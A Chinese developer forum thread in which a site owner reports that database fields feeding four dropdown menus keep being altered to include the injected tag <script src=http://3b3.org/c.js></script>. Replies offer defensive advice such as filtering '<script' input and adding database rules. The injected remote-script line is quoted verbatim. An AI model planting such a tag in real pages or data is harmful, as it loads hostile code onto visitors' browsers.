62,041
社区成员
发帖
与我相关
我的任务
分享网站被嵌入JS,散分请求帮助!
情况是这样的,就只有1个页面被入侵,该页面有4个DropDownlist 菜单联动,都是从数据库取的数据。
运行一段时间后发现,4个DropDownlist 都被加入了一段相同的代码 <script src=http://3b3.org/c.js></script>
检查数据后后发现,是数据库相应字段的内容都被改了。
我只好隔一段时间就手动update一次。
注:整个网站我都做了防SQL注入。
请求帮助!
运行一段时间后发现,4个DropDownlist 都被加入了一段相同的代码 <script src=http://3b3.org/c.js></script>
检查数据后后发现,是数据库相应字段的内容都被改了。
我只好隔一段时间就手动update一次。
注:整个网站我都做了防SQL注入。
请求帮助!
...全文
请发表友善的回复…
发表回复
anan221 2009-03-06
- 打赏
- 举报
顶下
wujinjian2008n 2009-03-03
- 打赏
- 举报
ding
sqqlovezqy 2009-03-03
- 打赏
- 举报
mark^^^^
stonehy520 2009-03-03
- 打赏
- 举报
帮顶 关注
ppp7p 2009-03-03
- 打赏
- 举报
数据库被注入了。。。
syc958 2009-03-03
- 打赏
- 举报
肯定是没有过滤<script 这样的字符......
lilei9633 2009-03-03
- 打赏
- 举报
应该不是上传的问题
我现在上传是有判断后缀的
我现在上传是有判断后缀的
hhxxcj 2009-03-03
- 打赏
- 举报
在提交时先过滤掉非法字符,再向数据库提交就行了,这个问题现在已经很普遍了,你专门定一个方法处理一下就行了
秋水与长天一色 2009-03-03
- 打赏
- 举报
常见的事情,解决办法,还真不知道。
sharpblade 2009-03-03
- 打赏
- 举报
学习一下,黑客不懂
lilei9633 2009-03-03
- 打赏
- 举报
能不能写一个关于规则的例子给我
randomfeel 2009-03-03
- 打赏
- 举报
同意,用数据库规则
lilei9633 2009-03-03
- 打赏
- 举报
是类似触发器的东西吗?
xiaohe185 2009-03-03
- 打赏
- 举报
Mark
大神来了丶 2009-03-03
- 打赏
- 举报
过滤非法字符串啊
我以前就碰到过
比如< script
什么的 用别的符号代替
读出来的时候再转换出来
我以前就碰到过
比如< script
什么的 用别的符号代替
读出来的时候再转换出来
bj890 2009-03-03
- 打赏
- 举报
不错!
wcl2222 2009-03-03
- 打赏
- 举报
最安全的方式就是用数据库的规则,增加一个规则,凡是含有<script src= 字样的,都不给通过!
wen1512 2009-03-03
- 打赏
- 举报
org?你被政府的互联网整顿小组盯上了
kingya2008 2009-03-03
- 打赏
- 举报
跟注入关系不大,是你的上传出了问题
Teng_s2000 2009-03-03
- 打赏
- 举报
http://topic.csdn.net/u/20081205/09/3dd06076-bcbe-45d4-998c-8999fdbe6fae.html
加载更多回复(11)
